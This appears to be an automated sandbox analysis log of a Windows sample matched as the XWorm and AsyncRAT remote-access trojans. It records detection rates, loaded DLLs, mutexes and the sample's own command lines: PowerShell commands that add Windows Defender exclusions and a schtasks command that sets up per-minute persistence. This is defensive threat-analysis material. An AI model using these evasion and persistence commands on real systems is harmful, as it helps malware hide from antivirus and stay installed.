                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B751B2D15_2_00007FFD9B751B2D
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B77103816_2_00007FFD9B771038
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B771B2D16_2_00007FFD9B771B2D
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B78103818_2_00007FFD9B781038
                    Source: ANuh30XoVu.exe, 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpoofer.exe4 vs ANuh30XoVu.exe
                    Source: ANuh30XoVu.exeBinary or memory string: OriginalFilenameSpoofer.exe4 vs ANuh30XoVu.exe
                    Source: ANuh30XoVu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: ANuh30XoVu.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: ANuh30XoVu.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: ANuh30XoVu.exe, vxjGd1yE2vEcsX1Hq.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ANuh30XoVu.exe, KTScPNetoTASaJuYX.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ANuh30XoVu.exe, KTScPNetoTASaJuYX.csCryptographic APIs: 'TransformFinalBlock'
                    Source: SYSTEM.0.dr, vxjGd1yE2vEcsX1Hq.csCryptographic APIs: 'TransformFinalBlock'
                    Source: SYSTEM.0.dr, KTScPNetoTASaJuYX.csCryptographic APIs: 'TransformFinalBlock'
                    Source: SYSTEM.0.dr, KTScPNetoTASaJuYX.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ANuh30XoVu.exe, ky3DMEYyogSR5YkmB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: ANuh30XoVu.exe, ky3DMEYyogSR5YkmB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: SYSTEM.0.dr, ky3DMEYyogSR5YkmB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: SYSTEM.0.dr, ky3DMEYyogSR5YkmB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@19/21@2/2
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMutant created: NULL
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeMutant created: \Sessions\1\BaseNamedObjects\kFBKXwGObnO6wWnE
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                    Source: ANuh30XoVu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ANuh30XoVu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: ANuh30XoVu.exeReversingLabs: Detection: 76%
                    Source: ANuh30XoVu.exeVirustotal: Detection: 68%
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile read: C:\Users\user\Desktop\ANuh30XoVu.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\ANuh30XoVu.exe "C:\Users\user\Desktop\ANuh30XoVu.exe"
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ANuh30XoVu.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ANuh30XoVu.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
